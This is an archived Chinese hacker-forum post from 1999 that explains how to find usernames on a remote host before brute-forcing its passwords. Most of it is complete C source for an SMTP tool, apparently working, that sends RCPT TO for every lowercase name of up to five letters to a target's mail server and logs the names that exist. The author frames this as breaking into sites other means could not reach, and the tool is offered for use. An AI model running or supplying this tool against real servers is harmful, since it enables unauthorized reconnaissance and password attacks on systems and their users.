精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◇程序代码◇>>如何获的远程主机上的用户列表

主题:如何获的远程主机上的用户列表
发信人: zer9()
整理人: williamlong(1999-09-28 22:15:37), 站内信件
cgi ,anonymous ftp,remote overflow...
当用尽了你所知道的技巧也不能进入站点时,
这时你只有两个选择:1。放弃 2。使用早以被你遗弃
的暴力法,强行突破。:)(I'd like this 0ne:)但为了
捍卫hacker的荣誉,当然是不能就此罢休的:)
如果让你从 telnet+/etc/passwd 或一个(或几个)用户名
+pop3hack你会选那一样?我选前者。试试就知道了.
确定远程主机上的用户名有如下几种方法: 
1.通过如finger,ruser之类的服务。
  (如 isp)
2.通过漏洞直接得到/etc/passwd,or the CORE include passwd
  (如sunos)
3.通过报纸,杂志慢慢的收集 :)
  (如。。。 电脑报 :)
4.通过sMTp(25).
...(还有什么遗漏的请告诉我哟:)
一般情况下前两种都是ADM 重点防范的对象,除非是
那些烂站,第三种你有耐心也可一试;
而第四种则是sMTp 本身固有的缺陷,
再加上sMtp的重要性,几乎绝大多数的站点都没有关闭之。
这也就成了我们利用的对象。在sMtp 的命令中,有价值
的有如下几种: VRFY,EXPN,RCPT。都可以利用。
但我测试的结果RCPt最快。具体程序如下。
                                                               zer9@21
cn.com
----Cut Here ---------------------------------------------------------
------


/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd
 *  thr0ugh "rcpt" gain rem0te server's user list  
 *                       by                               
 *                      zer9
 *                   
 *                  [email protected]
 *
 *          test on:slackware 2.0.34&irix6.4
 *               cc rcpt.c -o rcpt
 *         后台运行:nohup ./rcpt <Target>&
 */    
                
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <signal.h>
#include <ctype.h>
#include <arpa/inet.h>

#define  SMTPPORT   25
#define  VERSION     "0.08"
#define  LogFile    "./rcpt.log"
#define  TIMEOUT    200
#define  SleepTime  1

int ver(void);
int look_up(int sock,char *string,char *buff);
int writeln(int sock,char *string)
{
 char sendbuf[100];
 
 bzero(sendbuf,100);
 strncpy(sendbuf,string,strlen(string));
 strncat(sendbuf,"\n",1);
 send(sock,sendbuf,strlen(sendbuf),0);
 return 0;


int s;
FILE *fp;

int main(int argc,char *argv[])
{
 struct sockaddr_in sin;
 struct in_addr Target;
 struct hostent *he;
 char j;
 char recvbuf[1000],rcpt[200],a[8],hello_Target[500];
 
 if(argc!=2)
  {
   printf("Rcpt %s   by zer9[FTT]  mailto: [email protected]\n",VERSION);

   printf("Usage: %s <Target>\n",argv[0]);
   return -1; 
  }
 if((fp=fopen(LogFile,"a+"))==NULL)
 {
  perror("fopen");
  return -1; 
 }
 if((he=gethostbyname(argv[1]))!=NULL)
 {
  bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length);
 }
 else
  Target.s_addr=inet_addr(argv[1]);
 if(Target.s_addr==-1)
  {
   perror("gethostbyname");
   return -1; 
  }
  ver();
  fprintf(fp,"@Target: %s   ",argv[1]);
  if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
fprintf(fp,"=========================================================
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title */
{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT */
{
perror("no RCPT command. exit...");
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"mail from: [email protected]"); /*ma1l fr0m: [email protected]*/

recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");

/* 1 bits */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c",a[0]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/* 2 bits*/
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 4 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c",a[0],a[1],a[2],a[3]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 5 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
for(a[4]='a';a[4]<='z';a[4]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c%c",a[0],a[1],a[2],a[3],a[4]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/*in=fdopen(s,"r");
writeln(s,"rcpt to: hacker");
writeln(s,"rcpt to: root");
writeln(s,"rcpt to: sun");
writeln(s,"rcpt to: zero");
writeln(s,"rcpt to: zer0");
writeln(s,"rcpt to: uucp");
writeln(s,"rcpt to: 12345");
writeln(s,"rcpt to: ftp");
writeln(s,"rcpt to: guest");
writeln(s,"rcpt to: oracle");
writeln(s,"rcpt to: 345");
writeln(s,"rcpt to: uucp");

writeln(s,"QUIT");

while(fgets(recvbuf,sizeof(recvbuf),in)!=NULL)
{
if(strstr(recvbuf,"ok")!=NULL)
printf("%s",recvbuf);
fflush(in);
}
fclose(in); */
fprintf(fp,"=========================================================
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
fclose(fp);
close(s);
return 0;
}


int look_up(int sock,char *string,char *buff)
{
if(strstr(buff,"ent ok")!=NULL) /* at sendmail 8.8.7: Recipien
t ok*/
fprintf(fp,"%s",buff);
fflush(fp);
return 0;
}

int ver(void)
{
fprintf(fp,"\n###############################\n");
fprintf(fp,"Rcpt %s by zer9[FTT] mailto: [email protected]\n",VERSION)
;
return 0;
}



--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.105.75]

[关闭][返回]